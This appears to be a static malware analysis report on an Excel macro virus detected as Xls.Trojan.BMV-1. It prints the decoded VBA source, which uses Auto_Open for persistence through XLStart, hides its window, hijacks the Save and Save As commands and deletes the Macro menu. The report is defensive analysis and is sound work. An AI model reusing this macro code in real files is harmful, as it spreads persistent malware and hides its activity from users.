Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c126debf95dfab18…

MALICIOUS

Office (OLE)

48.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 7b0ed7901ed3ce6099e1a9627513fdc5 SHA-1: 5d44d36a2343b51f5949f35aaab6e8456c0719b1 SHA-256: c126debf95dfab18bf0a75406dcad447062ecc75b32d68e7f5a05808e973fc90
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

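The heuristic 'OLE_VBA_AUTO' (rated high in the list below) indicates the presence of an Auto_Open macro, which Excel runs automatically when the workbook is opened and which is commonly used for malicious execution. The VBA script copies its 'BMV' sheet into a new workbook and saves it to Excel's XLStart directory as 'BMV.xls'; because Excel loads every workbook found in XLStart at launch, this establishes persistence across Excel sessions. The visible macro code also hides the 'BMV' window, rebinds the Save and Save As commands to its own handlers, and deletes the Tools > Macro menu item. The ClamAV detection 'Xls.Trojan.BMV-1' independently corroborates the malicious verdict. Note that XLStart persistence is an Office application startup mechanism (ATT&CK T1137, Office Application Startup) rather than a registry Run key or the Windows Startup folder, so detections should watch for file writes under XLStart.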

Heuristics 3

  • ClamAV: Xls.Trojan.BMV-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.BMV-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23994 bytes
SHA-256: 9e481a9a902fd8f670f4a132d7d167c2cc2ab0ade936319ad4c8faf44647864d
Detection
ClamAV: Xls.Trojan.BMV-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BMV"
' Analyst note: the module is named "BMV", the same name used below for the
' sheet that is copied, the hidden window and the workbook dropped into XLStart.


' Toolbar and button that Add_BMV_Button replaces with a macro-bound copy.
Const strToolbar = "Standard"
Const strButtonName = "Save"
' Button id passed to ToolbarButtons.Add in Add_BMV_Button.
Const iButtonID = 2

' Module-level flags tested by Auto_Open right after it calls CheckVersion.
' CheckVersion is not part of this preview; presumably it sets them - confirm.
Dim NewVersionInstalled As Boolean
Dim SameVersionInstalled As Boolean

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
' Entry point: Excel runs a procedure named Auto_Open when the workbook is
' opened, so this code executes without any further user action once macros
' are allowed to run.
'
' Flow visible in this procedure:
'   1. Suppress alerts and screen redraw.
'   2. Call CheckVersion (not in this preview) and branch on the two flags.
'   3. Label I:       drop a copy of sheet "BMV" into XLStart and hide it.
'   4. Label StartUp: error path - install the toolbar/menu hooks.
'   5. Labels Z / X:  make sure a workbook exists, re-enable alerts.
'
' Any runtime error anywhere below jumps to StartUp instead of surfacing to
' the user.
On Error GoTo StartUp
    ' DisplayAlerts = False suppresses Excel prompts (for example an overwrite
    ' confirmation on SaveAs); ScreenUpdating = False hides the UI activity.
    ' ScreenUpdating is not restored anywhere in this procedure.
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    CheckVersion
    If NewVersionInstalled Then
        ' A newer copy is reported as installed: skip installation.
        GoTo X
    Else
        If SameVersionInstalled Then
            ' n is assigned but not read again in this procedure.
            n = ActiveWorkbook.Name
            GoTo X
        ' NOTE(review): NewVersion / SameVersion are not the module-level
        ' NewVersionInstalled / SameVersionInstalled flags. Unless they are
        ' declared in code outside this preview they are implicit, empty
        ' variables, and this condition holds whenever it is reached - confirm.
        ElseIf NewVersion = False And SameVersion = False Then
            ' RemoveTheOthers is defined outside this preview.
            RemoveTheOthers
            GoTo I
        End If
    End If
I:
    ' Installation / persistence step.
    ' fname is assigned but not read again in this procedure.
    fname = ActiveWorkbook.Name
    ' Sheets(...).Copy with no arguments creates a new workbook containing only
    ' the "BMV" sheet; that new workbook becomes the active one.
    Sheets("BMV").Copy
    ' Persistence indicator: the copy is written to <Excel program dir>\XlStart\BMV.xls.
    ' Excel opens every workbook in XLStart at launch, so the macro is loaded in
    ' each later Excel session. Defenders can key on creation of BMV.xls (or any
    ' unexpected workbook) under an XLStart directory. No passwords are set.
    ActiveWorkbook.SaveAs _
       Filename:=Application.Path + "\XlStart\BMV.xls", _
       FileFormat:=xlNormal, password:="", WriteResPassword:="", _
       ReadOnlyRecommended:=False, CreateBackup:=False
    ' Concealment: hide the window of the dropped workbook, then save it again
    ' (presumably so the hidden state is stored with the file - confirm).
    Windows("BMV").Activate
    ActiveWindow.Visible = False
    Workbooks("BMV").Save
    GoTo Z
StartUp:
    ' Reached only through the On Error handler above.
    If Windows.Count = 1 Then
        ' Replace the Save toolbar button and the File menu entries with
        ' macro-bound versions, then run BMV_Action (not in this preview).
        Add_BMV_Button
        Add_BMV_Menus
        BMV_Action
    Else
        ActiveWindow.Close
    End If
Z:
' Add a blank workbook when at most one workbook is open.
If Workbooks.Count <= 1 Then
    Workbooks.Add
End If
X:
    ' Common exit: alerts are switched back on.
    Application.DisplayAlerts = True
End Sub


Private Sub Add_BMV_Button()
    ' UI hijack: replaces the "Save" button on the "Standard" toolbar with a
    ' button of the same name whose click handler is the macro BMV_Save.
    ' Uses the Toolbars / ToolbarButtons collections (legacy Excel toolbar
    ' object model).
    Application.ScreenUpdating = False
    Set btns = Toolbars(strToolbar).ToolbarButtons
    Set btn = ButtonsIndex(btns, "Save")
    If Not (btn Is Nothing) Then
        ' Remove the existing Save button, then re-read the collection. The
        ' second lookup result is overwritten below before it is used.
        btn.Delete
        Set btns = Toolbars(strToolbar).ToolbarButtons
        Set btn = ButtonsIndex(btns, strButtonName)
    End If
    ' ButtonsLoc returns 1 when an "Open" button exists and 0 otherwise (it
    ' does not return the button's index), so the insert position below is
    ' always 3 when "Open" is present.
    iLoc = ButtonsLoc(btns, "Open")
    If iLoc = 0 Then
        Set btn = btns.Add(iButtonID)
    Else
        Set btn = btns.Add(iButtonID, iLoc + 2)
    End If
    ' The replacement keeps the familiar name but routes clicks to BMV_Save.
    btn.Name = strButtonName
    btn.OnAction = "BMV_Save"
End Sub


Private Function ButtonsIndex(ByVal Buttons As Object, ByVal bname As String) As Object
    ' Helper: returns the first item in Buttons whose Name equals bname.
    ' When nothing matches, the return value is never assigned and stays
    ' Nothing, which is what Add_BMV_Button tests for.
    For Each btn In Buttons
        If btn.Name = bname Then
            Set ButtonsIndex = btn
            Exit For
        End If
    Next
End Function


Private Function ButtonsLoc(ByVal Buttons As Object, ByVal bname As String) As Integer
    ' Helper: scans Buttons by index and reports whether an item named bname
    ' exists. Returns 1 on the first match and 0 (the unassigned Integer
    ' default) when there is none.
    n = Buttons.Count
    For I = 1 To n
        If Buttons(I).Name = bname Then
            ' Assigns the literal 1, not the loop index I, so the caller
            ' receives a found/not-found flag rather than a position.
            ButtonsLoc = 1
            Exit For
        End If
    Next
End Function


Sub Add_BMV_Menus()
Attribute Add_BMV_Menus.VB_ProcData.VB_Invoke_Func = " \n14"
' UI hijack on the worksheet menu bar: the File > "Save As..." and File > "Save"
' items are deleted and re-added bound to the macros BMV_FileSaveAs and
' BMV_Save, and the Tools > "Macro..." item is deleted.
' Any error (for example a menu item that does not exist) jumps to Z and
' silently skips the remaining edits.
On Error GoTo Z
    ' Replace File > Save As... with an identically captioned item that runs
    ' BMV_FileSaveAs.
    MenuBars(xlWorksheet).Menus("File").MenuItems("Save &As...").Delete
    MenuBars(xlWorksheet).Menus("File").MenuItems _
       .Add Caption:="Save &As...", _
       OnAction:="BMV_FileSaveAs", _
       Before:="Save &Workspace...", _
       StatusBar:="Saves document with new name, file format or password..."

    ' Replace File > Save with an item captioned "&Save..." that runs BMV_Save.
    ' ShortcutKey "^{s}" is presumably Ctrl+S - confirm.
    MenuBars(xlWorksheet).Menus("File").MenuItems("&Save").Delete
    MenuBars(xlWorksheet).Menus("File").MenuItems _
      .Add Caption:="&Save...", OnAction:="BMV_Save", _
       ShortcutKey:="^{s}", _
      Before:="Save &As...", _
      StatusBar:="Saves document..."
      
    ' Concealment indicator: removing Tools > Macro... takes away the usual
    ' menu path a user would follow to list or inspect macros.
    MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Z:
End Sub


Sub BMV_Save()
Attribute BMV_Save.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Handler bound to the replaced Save button and File > Save menu item.
    ' Every user-initiated save therefore passes through macro code first.
    Application.ScreenUpdating = False
    Select Case LCase(TypeName(ActiveSheet))
        Case "worksheet"
            ' An empty Path means the workbook has never been saved: go through
            ' the Save As handler. Otherwise call BMV_FileSave, which is
            ' defined outside this preview.
            If ActiveWorkbook.Path = "" Then
                BMV_FileSaveAs
            Else
                BMV_FileSave
            End If
        Case Else
            ' Any other sheet type is refused with a generic error dialog.
            Beep
            MsgBox "Save failed...", vbCritical
    End Select
    Application.ScreenUpdating = True
End Sub


Sub BMV_FileSaveAs()
Attribute BMV_FileSaveAs.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    If ActiveSheet.Name <> "" Then
        On Error GoTo Z
        fsave = Application _
                .Dialogs(xlDialogSaveAs).Show
        If fsave <> False Then
            BMV_FileSave
        End If
    End If
Z:
If Windows("BMV").Visible = True Then Wind
... (truncated)